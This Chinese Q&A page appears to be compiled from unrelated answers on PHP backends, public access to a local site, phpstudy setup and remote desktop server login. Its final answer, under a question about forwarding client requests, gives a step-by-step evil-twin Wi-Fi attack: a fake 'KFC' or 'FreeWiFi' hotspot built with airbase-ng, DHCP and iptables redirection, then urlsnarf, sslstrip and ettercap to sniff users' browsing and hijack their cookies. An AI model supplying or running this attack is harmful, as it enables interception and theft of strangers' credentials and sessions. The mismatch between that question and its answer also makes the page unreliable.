怎么访问本地php,app怎么访问数据库?
一般MySQL都不由APP进行直接的远程连接,而是交由后台服务器进行封装处理的。
举个例子。APP访问--》后台PHP服务器--》PHP访问本地MySQL数据库--》PHP返回查询给APP所以,一般的APP分为两部分,APP前端开发,PHP后台开发
支持php的公网的是?
所谓公网,就是所有人都可以访问网络,可以这样理解:自己电脑搭建php环境,创建网站,通过外网可以访问自己本机环境的网站,这个可以通过端口映射实现,如:花生壳,端口映射软件等等。
phpstudy安装完之后为什么打开本地域名一直显示php探针?
需要配置对应网站的虚拟主机然后访问才行
服务器怎么使用?
登录服务器商的网站管理账号。
找到购买的服务器,选择你需要操作的服务器点击进入。
进入服务器界面后,我们可以先点击“管理”操作。
如果不记得服务器密码,我们可以点击远程操作,在远程连接里面可以修改远程连接密码(一般购买好服务器后服务器商会把远程账号密码发你)。
接下来我们需要通过电脑远程连接服务器了,通过电脑mstsc.exe进程进入远程连接,先输入远程ip和用户名,点击连接。
然后输入远程密码,点击确定,这样我们就进入服务器远程桌面了。
在服务器远程桌面上我们安装网站运行环境(小编以phpstudy为例),然后我们把自己本地的网站搬到服务器,然后配置域名就可以了。
怎么转发所有客户端请求到指定ip?
方案1:iwconfig命令查看是否成功识别airmon-ng命令查看无线网卡情况,找到接入的USB无线网卡名称,airmon-ng start wlan2命令使USB无线网卡工作在监听模式; airbase-ng –e “KFC” –c 11 wlan0mon命令并回车,这样就生成了一个工作在11频道、SSID名称为“KFC”的热点; ifconfig –a命令,查看接口网卡at0是否存在,确认存在后, ifconfig at0 up命令启动接口网卡at0; 配置DHCP服务的各项参数,vim /etc/dhcp/dhcpd.conf命令并回车,开始编辑isc-dhcpd软件的配置文件,其中:ddns-update-style none表示不自动更新DNS与DHCP服务器的动态信息subnet 192.168.100.0 netmask 255.255.255.0表示IP地址段为192.168.100.0/24,子网掩码为255.255.255.0range 192.168.100.50 192.168.100.100表示用于分配的IP地址为.50-.200option subnet-mask 设置子网掩码,option broadcast-address设置广播地址option routers 192.168.100.1表示设置网关为192.168.100.1option domain-name-servers 10.0.1.106表示设置DNS解析服务器为10.0.1.106 配置详细:subnet 192.168.100.0 netmask 255.255.255.0 {range 192.168.100.50 192.168.100.200;option subnet-mask255.255.255.0; #子网掩码option broadcast-address192.168.100.255; #广播地址option routers192.168.100.1; #网关option domain-name-sercers10.0.1.106; #DNS解析服务器,.106这个ip是bt5的(另外一台虚拟机)default-lease-time 21600;max-lease-time 43200;} 编辑好后,按“Esc”键,敲入“:wq”保存退出.ifconfig at0 192.168.100.1 netmask 255.255.255.0命令并回车,设置接口网卡at0的ip地址和子网掩码;route add –net 192.168.100.0 netmask 255.255.255.0 gw 192.168.100.1命令并回车,表示增加一条路由记录,使192.168.100.1网关生效;dhcpd –d –f –cf /etc/dhcp/dhcpd.conf at0命令并回车,启动DHCP服务; 打开新的终端echo 1 > /proc/sys/net/ipv4/ip_forward命令并回车,开启系统数据转发功能;iptables –t nat –A POSTROUTING --out-interface eth0 –j MASQUERADE命令并回车,设置iptables转发,将所有数据转发到eth0网卡;urlsnarf –i at0启动urlsnarf软件,嗅探输出at0网卡上所有HTTP访问记录; 方案2:使用 airbase-ng + dhcpd 创建虚拟WiFi热点;顺便使用 sslstrip+ettercap 进行中间人攻击,嗅探使用者的上网信息和劫持cookie!所需要的软件如下;kali-linux都已经自带了,其他的系统可以自行安装:Aircrack-ng 套件 #用来发送数据isc-dhcp-server #简单的dhcp服务器sslstrip #突破ssl加密ettercap #嗅探劫持vim /etc/dhcp/dhcpd.conf 编辑dhcp服务器配置文件,修改如下:authoritative;default-lease-time 700;max-lease-time 8000;subnet 10.0.0.0 netmask 255.255.255.0 {option routers 10.0.0.1;option subnet-mask 255.255.255.0;option domain-name "FreeWiFi";option domain-name-servers 10.0.0.1;range 10.0.0.10 10.0.0.100; }然后激活网卡至监听模式:airmon-ng start wlan0airbase-ng -e FreeWiFi -c 6 mon0此时虚拟wifi的信号已经发送出去了,如果出现错误:Error: Got channel -1, expected a value > 0.执行如下命令:airmon-ng stop mon0ifconfig wlan0 downiwconfig wlan0 mode monitorifconfig wlan0 up然后从激活网卡至监听模式那里重新开始。接着执行如下命令:ifconfig at0 upifconfig at0 10.0.0.1 netmask 255.255.255.0ifconfig at0 mtu 1400route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1iptables --flushiptables --table nat --flushiptables --delete-chainiptables --table nat --delete-chainecho 1 > /proc/sys/net/ipv4/ip_forwardiptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1iptables -P FORWARD ACCEPTiptables --append FORWARD --in-interface at0 -j ACCEPTiptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADEiptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0/etc/init.d/isc-dhcp-server start虚拟WiFir热点创建成功,接下来就是嗅探欺骗钓鱼了:sslstrip -fpk 10000ettercap -Tpuqi at0